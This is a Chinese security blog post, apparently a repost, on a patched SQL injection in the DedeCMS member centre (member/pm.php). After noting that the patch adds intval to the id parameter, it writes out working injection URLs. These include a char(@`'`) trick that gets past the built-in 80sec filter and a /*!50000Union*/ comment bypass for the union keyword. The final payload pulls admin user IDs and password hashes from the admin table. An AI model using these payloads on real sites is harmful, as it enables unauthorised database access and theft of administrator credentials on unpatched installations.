DEDECMS会员中心注入2

没穿底裤 2020年1月1日03:36:05评论308 views字数 716阅读2分23秒阅读模式
摘要

Author:Sunshie
QQ:1141056911
Blog:http://phpinfo.me
F4ck Team & Ezenteam
#######################

Author:Sunshie
QQ:1141056911
Blog:http://phpinfo.me
F4ck Team & Ezenteam
#######################

http://www.wooyun.org/corps/Dedecms

乌云上已经刷爆啦  但是没公开细节

漏洞文件member/pm.php (官方已修补)

下载补丁下来看看member/pm.php文件到底修补了什么

 

DEDECMS会员中心注入2

 

对id加了个intval

看来id是有注入的j节奏了
DEDECMS会员中心注入2

关键在这里

先构造语句  DEDE不是有80sec防注入嘛  所以加个char(@`’`)
SELECT * FROM `#@__member_pms` WHERE id=’1′and char(@`’`) and 1=2 UniOn SelEct 1,2,3,4,5,6,7,8,9,10,11,12 #’ AND (fromid=’6′ OR toid=’6′)

然后提交
http://127.0.0.1/dede/member/pm. … =2+UniOn+SelEct%201,2,3,4,5,6,7,8,9,10,11,12%20%23

 

DEDECMS会员中心注入2

 

Safe Alert: Request Error step 1 !

 

 

DEDECMS会员中心注入2

滤union神马的  绕过无压力直接/*!50000Union*/ 就可以过了

然后提交

http://127.0.0.1/dede/member/pm.php?dopost=read&id=1′and char(@`’`) and 1=2+/*!50000Union*/ +/*!50000select*/ +1,2,3,4,5,6,userid,8,9,10,11,pwd+from+`%23@__admin`%23

 

 

DEDECMS会员中心注入2

 

成功注入

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日03:36:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DEDECMS会员中心注入2http://cn-sec.com/archives/75364.html

发表评论

匿名网友 填写信息